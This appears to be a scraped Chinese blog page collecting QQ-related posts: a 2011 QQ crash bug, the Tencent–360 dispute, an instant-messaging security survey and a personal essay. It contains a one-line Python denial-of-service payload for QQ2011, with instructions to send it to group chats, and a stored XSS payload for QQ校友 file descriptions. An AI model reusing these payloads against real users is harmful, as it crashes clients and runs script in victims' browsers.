QQ2011溢出漏洞,从昨天开始QQ收到消息经常无辜崩溃,其内容就是3384个0x0D 加 1个0×20,目前QQ还未更新升级,QQ用户大面积收到攻击中…
QQ2011溢出漏洞代码,从昨天开始QQ收到消息经常无辜崩溃,其内容就是3384个0x0D 加 1个0×20,目前QQ还未更新升级,QQ用户大面积收到攻击中…
QQ2011溢出漏洞代码,从昨天开始QQ收到消息经常无辜崩溃,其内容就是3384个0x0D 加 1个0×20,目前QQ还未更新升级,QQ用户大面积收到攻击中…
QQ 0day python exploit: open(‘QQ.txt’, ‘wb’).write(chr(13)*3384+chr(32))
在群内发送文件里的文本,对方QQ版本是2011,那么将会全部崩溃。
360和腾讯的大战第三发消息放出:11月3日晚间消息,对于360与QQ之间的纠纷,腾讯今日下午发布公告,称在双方纠纷解决之前,腾讯将在装有360软件的电脑上停止运行QQ软件。业内认为,腾讯此举是逼迫用户作出二选一的选择。
阅读全文
我在节前写了《360决战QQ》,这几天战争不断升级,先是总部位于俄罗斯的安全软件厂商——卡巴斯基实验室在其中文官方网站上,发表了一篇言辞激烈的声明,批评竞争对手360公司针对“超级工厂”恶性病毒的解读和官方新闻“欺骗4亿网民”。
腾讯昨晚发出公告称,正式起诉360不正当竞争,要求奇虎及其关联公司停止侵权、公开道歉并作出赔偿。
据腾讯声明,腾讯在诉状中称,“该‘360隐私保护器’通过监测腾讯QQ聊天软件的运行,利用虚假宣传手段,误导和欺骗用户,诬蔑原告和原告的产品‘窥视’用户的隐私,给原告及原告的产品和服务的声誉造成极大损害。同时,被告还通过官方博客、官方论坛、制作专题等方式,称‘QQ窥探用户隐私已久’、‘QQ侵犯用户隐私’、‘QQ承认窥探隐私’、‘QQ正偷窥您的隐私’、‘请慎重选择QQ’,诋毁原告及原告的产品和服务。”
针对腾讯对360的起诉,360给网易科技发来三点回应,表示将提起反诉。
事情如何进展,我们继续关注。。。。。。。。。。。。
最近QQ校友很火,我的几个QQ群也纷纷建立QQ校友,但是问题马上出现,哪里火,那里就有人去挖掘啊!
作者:孤鸿影
作者已通知腾讯。
漏洞一:
QQ校友 班级共享硬盘 上传文件时对文件描述没有做任何过滤,导致XSS。
QQ校友使用了Ajax技术,来显示文件列表。在文件Msharemsg.js中使用innerHTML输出文件列表的HTML代码。由于使用了innerHTML,所以直接插入代码: <script>alert(‘孤鸿影’)</script>不会被执行。使用下面的格式既可:<script defer>alert(‘孤鸿影’)</script>。加入defer属性,那么浏览器在下载脚本的时候就不会立即对其进行处理,而是继续对页面进行下载和解析。这样我们插入的JavaScript就能正常运行。
阅读全文
来自:cnbeta
ps:本来想看看内容,结果发现要12000,太贵了,还是算了吧。
在线聊天用哪个服务平台最安全?艾瑞咨询(iResearch)近日发布了首份针对即时通讯安全性的调研报告——《2008年个人即时通讯网络安全研 究报 告》.报告显示,在针对腾讯QQ、微软MSN、阿里旺旺等国内主流即时通讯平台安全性的用户调研当中,有超过七成的用户对于QQ的安全性表示“满意 ”,有35.5%的用户对于QQ的安全性表示“非常满意”,评价均为最高.即时通讯已成为中国互联网最为普及的网络应用之一.根据艾瑞 《2007-2008年中国即时通讯行业发展报告》统计,2007年中国即时通讯用户规模已经突破1.7亿户,2008年达到2.1亿户.网民对即时通讯 工具的使用率超过80%.
阅读全文
From:S.S.F Simeon
阅读全文
新闻来源:羊城晚报
我是在cnbeta上看到的这篇文章,感觉是很多人的现实的写照。因为我的QQ基本上也是长期处于隐身状态,聊天很少很人单独说话了,都是在群里面随便说几句而已。而且像我这样的人还是很多的,有时候突然间一群人跳出来参与群聊,而这些人都是处于隐身状态。虽然说彩虹版的能够探测隐身,但是我感觉不好,每个人人都有隐身的权利,我们不应该剥夺。好吧,废话不多说了,下面放原文:
我刚上线,QQ对话框里就跳出来一段话:“半年了都不见你上网?”是我的一位大学同学,我写了一行字过去:“其实我每天都在线,不过隐身而已.” 阅读全文
很 快,QQ上一个灰色的头像就动了起来,原来我这个同学也在隐身,他说:“其实也没有什么事.”然后他的头像继续灰色,我们谁也没有继续聊天,就这样归于沉默.
